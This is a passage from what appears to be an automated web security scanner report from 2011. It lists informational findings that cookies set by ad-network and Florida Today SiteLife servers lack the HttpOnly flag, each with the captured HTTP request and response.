ShvDZxpY4-NTPO_cWHxychz2AkV4XXIJ0g; rrs=1%7C2%7C3%7C4%7C1002%7C6%7C7%7C7%7C9%7C1001%7C1006%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7C1007%7C1008; rds=15093%7C15093%7C15093%7C15097%7C15085%7C15097%7C15097%7C15082%7C15093%7C15093%7C15091%7C15093%7C15093%7C15093%7Cundefined%7C15093%7Cundefined%7C15097%7C15093; rv=1; uid=2931142961646634775

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Sat, 05-Nov-2011 13:59:59 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:59 GMT
Content-Length: 335

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=4369754592172087684&fpid=4&nu=n&t=
...[SNIP]...
10.104. http://r1-ads.ace.advertising.com/site=743832/size=728090/u=2/bnum=29047542/hr=9/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.floridatoday.com%252Farticle%252F20110508%252FNEWS01%252F105080319%252FHighly-publicized-murder-Caylee-Anthony-rivets-enrages  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=743832/size=728090/u=2/bnum=29047542/hr=9/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.floridatoday.com%252Farticle%252F20110508%252FNEWS01%252F105080319%252FHighly-publicized-murder-Caylee-Anthony-rivets-enrages

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=743832/size=728090/u=2/bnum=29047542/hr=9/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.floridatoday.com%252Farticle%252F20110508%252FNEWS01%252F105080319%252FHighly-publicized-murder-Caylee-Anthony-rivets-enrages HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://media.adfrontiers.com/pq?t=f&s=923&ts=1304949604772&cm=1148&ac=5&at=1&xvk=60302672.07185271&fd=t&tc=1&rr=t
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; F1=B8ziF3kAAAAAgCsCAEAAgEABAAAABAAAAMAAgEA; BASE=Rgwq9yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2unWu4QL44U5Tp5J7h57WACK9DFolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpUSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3eAQ44q0qPrQrsF+Mlvp1J!; ROLL=boAnq2C+ORAgHEGte/mz/DHyJN5VpuB!; C2=bN/xN5pqDIxFGxkovMg3sYU8SKMCItdBwhQ3WXAcIsY4FAHCw3gBwhQ7NYAcIoLOGAHCKGeBwhwmhXAcI8eDGAHCdDmBwhwohXAcIQY4FAHCYimBwhA3WaAcIoa4FAHCA9qBwhgdeZAcI4fFGAHCbTeBwhwKOaAcIoN5FAHCC9qBwhwtZaAcIE0rGAHCFBqBwhQTaaAcIY4dGAHCNLqBwVrqDoxsGFftrSQIzaQHRGABg2cxFZm5IaMJxOCBsRphd0I9HsfzFz+i4SQBwWkTltCqGXFseSw7RaIXVSPBrLqRONJUEQT2FyFruTQAzZIX0KHBbzqhcl6BE8sXGyFogRwrgYc4zWdBkoqRwM67FcNNGhWkAbwuRXMUumvBEOpR+NLUGsEpGlIq+bQoeZ4jfOsBgwhB3W7/HUJtGTRZpTrxMFqFH09IGrUo8ew5qYITY6wBsMiBqcAnjagKHEv9FoSqGdQ9fZI2FirZDugxkELJI8GlGlE; GUID=MTMwNDk0OTU5NTsxOjE2cjRvcHExdHZsa21sOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 14:00:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.884214.743832.0XMC
Set-Cookie: F1=Bg28H3kAAAAAYm1CAEAAgEABAAAABAAAAEAAgEA; domain=advertising.com; expires=Wed, 08-May-2013 14:00:08 GMT; path=/
Set-Cookie: BASE=Rgwq9yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2unWu4QL44U5Tp5J7h57WACK9DFolo7ZgEc+TO66LxZCWBHxwyDEc8c4CpUSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3eAQ44q0qPrQrsF+Mlvp1J!; domain=advertising.com; expires=Wed, 08-May-2013 14:00:08 GMT; path=/
Set-Cookie: ROLL=boAno2CkdKAgj1G!; domain=advertising.com; expires=Wed, 08-May-2013 14:00:08 GMT; path=/
Set-Cookie: 29047542=_4dc7f368,4264037248,743832^884214^81^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 09 May 2011 14:00:08 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 601

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.5;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000743832/m
...[SNIP]...
10.105. http://rt.legolas-media.com/lgrt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rt.legolas-media.com
Path:   /lgrt

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lgrt?ci=2&ei=9&ti=53&pbi=36&ord=5068520 HTTP/1.1
Host: rt.legolas-media.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ui=05a5761a-b8e3-4fc1-b933-f9f7eb10c6b9; lgtix=HAACALsA

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 13:59:50 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: lgpr=//8=; path=/; expires=Tue, 10 May 2011 13:59:50 GMT; domain=.legolas-media.com
P3P: policyref="http://www.legolas-media.com/w3c/p3p.xml",CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: -1
Cache-Control: no-cache; no-store
Content-Type: application/javascript
Set-Cookie: lgtix=NQABAL0AHAACALsA; path=/; expires=Sat, 01-Jan-2050 23:59:59 GMT; domain=.legolas-media.com
Content-Length: 0
Connection: close

10.106. http://services.krxd.net/pixel.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://services.krxd.net
Path:   /pixel.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel.gif?_kcp_d=nme.com&_kpid=3efee9db-7d85-4533-9e41-c635ebf2d937&_kcp_s=NME&_kcp_sc=News&_kcp_ssc=news&_kua_loggedIn=no&_kpa_pageTitle=Sufjan%20Stevens%20suffered%20%26%23039%3Bbreakdown%26%23039%3B%20while%20watching%20%26%23039%3BFantastic%20Mr%20Fox%26%23039%3B%20%7C%20News%20%7C%20NME.COM&_kpa_contentId=none&_knifr=14&_kpix_0=http%3A%2F%2Fpixel.rubiconproject.com%2Ftap.php%3Fv%3D4705&_kpix_1=http%3A%2F%2Fwww.burstbeacon.com%2Fview%2F103170%2F64948%2F182030%2F318088%2F3050%2F2D1A28EF%2F&_kpix_2=http%3A%2F%2Fwww.burstnet.com%2Fenlightn%2F7578%2F%2F12A4%2F&_kpix_3=http%3A%2F%2Fb.scorecardresearch.com%2Fb%3FC1%3D8%26C2%3D6035047%26C3%3D201.2%26C4%3Dad20731a%26C5%3D182030%26C6%3D0%26C7%3Dhttp%253A%2F%2Fwww.nme.com%2Fnews%2Fsufjan-stevens%2F56527%26C8%3DSufjan%2520Stevens%2520suffered%2520%2527breakdown%2527%2520while%2520watching%2520%2527Fantastic%2520Mr%2520Fox%2527%2520%257C%2520News%2520%257C%2520NME.COM%26C9%3D%26C10%3D1920x1200%26rn%3D46905169&_kpix_4=http%3A%2F%2Fpixel.quantserve.com%2Fpixel%2Fp-e4m3Yko6bFYVc.gif%3Flabels%3DMusic%2CEntertainment&_kpix_5=http%3A%2F%2Ftrgca.opt.fimserve.com%2Ffp.gif%3Fpixelid%3D287-036699%26diresu%3D154dab7990adc1d6f3372c12&_kpix_6=http%3A%2F%2Fpixel.quantserve.com%2Fpixel%2Fp-e4m3Yko6bFYVc.gif%3Flabels%3DMusic%2CEntertainment&_kpix_7=http%3A%2F%2Ftrgca.opt.fimserve.com%2Ffp.gif%3Fpixelid%3D287-036699%26diresu%3D154dab7990adc1d6f3372c12&_kpix_8=http%3A%2F%2Fpixel.quantserve.com%2Fpixel%2Fp-e4m3Yko6bFYVc.gif%3Flabels%3DMusic%2CEntertainment&_kpix_9=http%3A%2F%2Ftrgca.opt.fimserve.com%2Ffp.gif%3Fpixelid%3D287-036699%26diresu%3D154dab7990adc1d6f3372c12&_kpix_10=http%3A%2F%2Faka-cdn-ns.adtech.de%2Fimages%2F175%2FAd2832047St1Sz16Sq3827014V1Id5.gif HTTP/1.1
Host: services.krxd.net
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: private, no-cache, no-store
Content-Type: image/gif
Date: Mon, 09 May 2011 14:07:03 GMT
Last-Modified: Tue, 14 Dec 2010 00:06:17 GMT
P3P: policyref="http://cdn.krxd.net/kruxcontent/p3p.xml", CP="NON DSP COR NID OUR DEL SAM OTR UNR COM NAV INT DEM CNT STA PRE LOC OTC"
Server: Apache
Set-Cookie: _kuid_=10.83.71.216.1304950023530725; path=/; expires=Sat, 05-Nov-11 14:07:03 GMT; domain=.krxd.net
X-Request-Time: D=102 t=1304950023530639
X-Served-By: logger005.krxd.net
Content-Length: 42
Connection: keep-alive

GIF89a.............!.......,........@..D.;
10.107. http://sitelife.floridatoday.com/ver1.0/Content/images/store/12/1/6c2f9a14-d970-4d97-b1b8-998eda420787.Large.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.floridatoday.com
Path:   /ver1.0/Content/images/store/12/1/6c2f9a14-d970-4d97-b1b8-998eda420787.Large.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/images/store/12/1/6c2f9a14-d970-4d97-b1b8-998eda420787.Large.jpg HTTP/1.1
Host: sitelife.floridatoday.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: digtriadprod=R2831597222; path=/
Content-Length: 16542
Content-Type: image/jpeg
Last-Modified: Sun, 08 May 2011 17:22:20 GMT
Accept-Ranges: bytes
ETag: "7863da7ca4dcc1:6e93"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 13:59:32 GMT

......JFIF.....`.`.....C.........................    ....................!........."$".$.......C.......................................................................`.9.."..............................
...[SNIP]...
10.108. http://sitelife.floridatoday.com/ver1.0/Content/images/store/13/14/3d0cb25d-d19d-4993-ae7a-7bb7b30af008.Large.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.floridatoday.com
Path:   /ver1.0/Content/images/store/13/14/3d0cb25d-d19d-4993-ae7a-7bb7b30af008.Large.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/images/store/13/14/3d0cb25d-d19d-4993-ae7a-7bb7b30af008.Large.jpg HTTP/1.1
Host: sitelife.floridatoday.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: digtriadprod=R2831598311; path=/
Content-Length: 21072
Content-Type: image/jpeg
Last-Modified: Sun, 08 May 2011 17:22:20 GMT
Accept-Ranges: bytes
ETag: "9b677d7ca4dcc1:6e93"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 13:59:32 GMT

......JFIF.....`.`.....C.........................    ....................!........."$".$.......C.........................................................................`.."..............................
...[SNIP]...
10.109. http://sitelife.floridatoday.com/ver1.0/Direct/DirectProxy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.floridatoday.com
Path:   /ver1.0/Direct/DirectProxy

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Direct/DirectProxy HTTP/1.1
Host: sitelife.floridatoday.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: digtriadprod=R4278572220; path=/
Cache-Control: public, max-age=86374
Content-Length: 729
Content-Type: text/javascript; charset=utf-8
Expires: Tue, 10 May 2011 08:22:28 GMT
Last-Modified: Mon, 09 May 2011 08:22:28 GMT
ETag: 178565259
Vary: Host
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: l3vm210l3pluckcom
Date: Mon, 09 May 2011 13:59:34 GMT

document.write("<script type='text/javascript' src='http://sitelife.floridatoday.com/ver1.0/content/direct/scripts/yahoo-min.js'></script>");
document.write("<script type='text/javascript' src='http:
...[SNIP]...
10.110. http://sitelife.floridatoday.com/ver1.0/content/direct/scripts/json-min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.floridatoday.com
Path:   /ver1.0/content/direct/scripts/json-min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/content/direct/scripts/json-min.js HTTP/1.1
Host: sitelife.floridatoday.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: digtriadprod=R4278572220

Response

HTTP/1.1 200 OK
Set-Cookie: digtriadprod=R4278572220; path=/
Content-Length: 3480
Content-Type: application/x-javascript
Last-Modified: Wed, 12 Jan 2011 18:12:17 GMT
Accept-Ranges: bytes
ETag: "71c66d3f84b2cb1:8bf"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 13:59:37 GMT

/*
Copyright (c) 2008, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.net/yui/license.txt
version: 2.6.0
*/
YAHOO.lang.JSON=(function(){var l=YAHOO.lang,_
...[SNIP]...
10.111. http://sitelife.floridatoday.com/ver1.0/content/direct/scripts/pork.iframe.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.floridatoday.com
Path:   /ver1.0/content/direct/scripts/pork.iframe.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/content/direct/scripts/pork.iframe.js HTTP/1.1
Host: sitelife.floridatoday.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: digtriadprod=R4278572220

Response

HTTP/1.1 200 OK
Set-Cookie: digtriadprod=R4278572220; path=/
Content-Length: 5079
Content-Type: application/x-javascript
Last-Modified: Wed, 04 May 2011 22:50:07 GMT
Accept-Ranges: bytes
ETag: "5c44c59dadacc1:8bf"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 13:59:38 GMT

document.iframeLoaders = {};

iframe = function() { this.initialize.apply(this, arguments); };
iframe.prototype = {
initialize: function(form, options, count) {
count = count || (new Date
...[SNIP]...
10.112. http://sitelife.floridatoday.com/ver1.0/content/direct/scripts/requestbatch.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.floridatoday.com
Path:   /ver1.0/content/direct/scripts/requestbatch.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/content/direct/scripts/requestbatch.js HTTP/1.1
Host: sitelife.floridatoday.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: digtriadprod=R4278572220

Response

HTTP/1.1 200 OK
Set-Cookie: digtriadprod=R4278572220; path=/
Content-Length: 11342
Content-Type: application/x-javascript
Last-Modified: Wed, 04 May 2011 21:27:06 GMT
Accept-Ranges: bytes
ETag: "83414f4a2acc1:8bf"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 13:59:38 GMT

if (typeof(RequestBatch) === 'undefined') {
RequestBatch = function() {
this.initialize.apply(this, arguments);
};
// for unique id
var counter = 0;

// how many reque
...[SNIP]...
10.113. http://sitelife.floridatoday.com/ver1.0/content/direct/scripts/requesttypes.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.floridatoday.com
Path:   /ver1.0/content/direct/scripts/requesttypes.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/content/direct/scripts/requesttypes.js HTTP/1.1
Host: sitelife.floridatoday.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: digtriadprod=R4278572220

Response

HTTP/1.1 200 OK
Set-Cookie: digtriadprod=R4278572220; path=/
Content-Length: 76278
Content-Type: application/x-javascript
Last-Modified: Wed, 04 May 2011 21:27:06 GMT
Accept-Ranges: bytes
ETag: "238e9b4a2acc1:8bf"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 13:59:38 GMT


// ------------------------------------------------------------------------------------
// This file contains all the request type objects for the SiteLife JSON Direct API.
// Create instances of
...[SNIP]...
10.114. http://sitelife.floridatoday.com/ver1.0/content/direct/scripts/yahoo-min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.floridatoday.com
Path:   /ver1.0/content/direct/scripts/yahoo-min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/content/direct/scripts/yahoo-min.js HTTP/1.1
Host: sitelife.floridatoday.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: digtriadprod=R4278572220

Response

HTTP/1.1 200 OK
Set-Cookie: digtriadprod=R4278572220; path=/
Content-Length: 5833
Content-Type: application/x-javascript
Last-Modified: Wed, 12 Jan 2011 18:12:17 GMT
Accept-Ranges: bytes
ETag: "d628703f84b2cb1:8bf"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 13:59:36 GMT

/*
Copyright (c) 2008, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.net/yui/license.txt
version: 2.6.0
*/
if(typeof YAHOO=="undefined"||!YAHOO){var YAHO
...[SNIP]...
10.115. http://sitelife.floridatoday.com/ver1.0/daapi2.api  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.floridatoday.com
Path:   /ver1.0/daapi2.api

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ver1.0/daapi2.api?jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22PayloadType%22%3A%22Requests.External.ArticleRequest%22%2C%22Payload%22%3A%22%7B%5C%22ObjectType%5C%22%3A%5C%22Requests.External.ArticleRequest%5C%22%2C%5C%22ArticleKey%5C%22%3A%7B%5C%22ObjectType%5C%22%3A%5C%22Models.External.ExternalResourceKey%5C%22%2C%5C%22Key%5C%22%3A%5C%2220110508.floridatoday.A9105080319.article.NEWS01%5C%22%7D%2C%5C%22ViewTrackRequest%5C%22%3Afalse%7D%22%7D%5D%2C%22ObjectType%22%3A%22Requests.RequestBatch%22%7D&jpcb=PluckSDKjpcb&jpctx=request_0 HTTP/1.1
Host: sitelife.floridatoday.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs=D08734_70008|D08734_72078; GCIONSN=AAAAOn52dzoxfnVidDox; s_cc=true; s_sq=%5B%5BB%5D%5D; gban=inter%3Ddisabled%3Atrue%2Cviews%3A1%2Cexpiry%3A16H%2Cplacementid%3A1273145%2Cpreload%3Afalse%2Cid%3Ainter%2Ccontrolurl%3Ahttp%253A//gannett.gcion.com/addyn/3.0/5111.1/1273144/0/0/ADTECH%253Balias%253Dfl-brevard.flatoday.com/news/article.htm_Interstitial%253Bcookie%253Dinfo%253Bloc%253D100%253Btarget%253D_blank%253Bgrp%253D24711%253Bmisc%253D1304949586599%253Bsize%253D0%253Bnoperf%253D1%2Cexpires%3A1305007188; digtriadprod=R4278572220

Response

HTTP/1.1 200 OK
Set-Cookie: digtriadprod=R4278572220; path=/
Cache-Control: public, must-revalidate
Content-Type: application/x-javascript; charset=utf-8
Expires: Mon, 09 May 2011 14:00:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: l3vm210l3pluckcom
Set-Cookie: SiteLifeHost=l3vm210l3pluckcom; domain=floridatoday.com; path=/
Set-Cookie: anonId=34faabe1-935e-4483-8538-ddb5398c32aa; domain=floridatoday.com; expires=Tue, 08-May-2012 14:00:40 GMT; path=/
Date: Mon, 09 May 2011 14:00:39 GMT
Content-Length: 3035

PluckSDKjpcb({
"Envelopes": [
{
"PayloadType": "Responses.External.ArticleResponse",
"Payload": "{\r\n \"Article\": {\r\n \"ArticleKey\": {\r\n \"Key\": \"20110508.flori
...[SNIP]...
10.116. http://sitelife.floridatoday.com/ver1.0/direct/javascriptsdkproxy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.floridatoday.com
Path:   /ver1.0/direct/javascriptsdkproxy

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/direct/javascriptsdkproxy HTTP/1.1
Host: sitelife.floridatoday.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
